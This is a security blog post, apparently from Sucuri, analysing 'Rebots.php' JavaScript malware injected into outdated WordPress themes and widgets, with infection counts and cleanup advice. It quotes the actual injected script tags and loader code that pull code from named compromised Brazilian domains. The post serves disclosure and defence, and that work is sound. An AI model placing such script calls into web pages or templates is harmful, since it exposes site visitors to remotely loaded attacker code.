Rebots.php JavaScript Malware Being Actively Injected

Holy JavaScript malware, Batman! On August 11th we started seeing the Rebot JavaScript malware string injected on various websites. Since then, it has increased its appearances, and has variated the way it’s being included on the infected sites.

Rebots

When you visit a compromised site, it will attempt to load an additional JavaScript, like one of these:

<script src="http://lig-limp.com.br/rebots.php"..

<script; src="http://chezbruna.com.br/imagens/rebots.php"..

What’s It Do?

From what we’re seeing now, not much. The domains being included by the script call are either 404 at this point, or loading broken code leading to dead links. For example:


if(navigator.javaEnabled()) {
	document.write(' src="http://chezbruna.com.br//imagens/rebots.php?action=jv&h=1687634524"

The pages on a site you may find it will vary, and so will the files that are actually infected. Here’s a quick SiteCheck screen:

SiteCheck

Note: Notice that SiteCheck shows the site outdated. This website was running WordPress 3.2.1 at the time of scan. This seems to be a common theme across the websites we’re seeing affected by Rebots.

Where to Find it

As mentioned, this will variate. Originally we were seeing the script called in theme templates. At first the script would appear above the HTML tags in the rendered source, and we were finding the offending code in header.php and/or index.php within the active WordPress theme.

Over the next few days, those instances were still happening, but we also started seeing the script called from functions.php and even stylesheets within the active theme.

Apparently this got old quick, next we started seeing the script appear in text widgets within WordPress.

Rebot in Widgets

Quick Info

We’re still researching numbers and hopefully it quits growing. So far, we have seeing infections with those URLS:

http://hroil.com.br/old/rebots.php - 98 sites infected with it
http://lig-limp.com.br/rebots.php - 357 sites infected with it
http://chezbruna.com.br/imagens/rebots.php - 497 sites infected with it

That’s only the ones that we scanned directly. However, if you go on Google and search for “chezbruna.com.br/imagens/rebots.php” or “lig-limp.com.br/rebots.php” you’ll see quite a few more sites being affected.

What Do I do?

First thing do check is that all the software on your server is updated. I’m talking applications, themes, plugins, and so on. If you don’t use it, get rid of it. Cross-Website Contamination happens all too often, so make sure to do some website garage cleaning ASAP.

Next thing to do is go scan your site with Sucuri SiteCheck. Seriously, it takes second, it’s free, and it will let you know if you’ve been struck by Rebots.

If you have been hit and you need a hand clearing it, we can get you cleared and will cover you for the year. Check our the Sucuri service plans today.


Have you seen the Rebots JS Malware? What’s your experience? Have you seen variations, or other domains affected? Feel free to email Sucuri, or leave a comment below.

Scan your website for free:
About Tony Perez

Tony is the Co-Founder / CEO at Sucuri. He shares a deep passion for Information Security, Business and Brazilian JiuJitsu. He approaches the business the same as he trains BJJ, one move at a time and gently. You can follow him on twitter: @perezbox.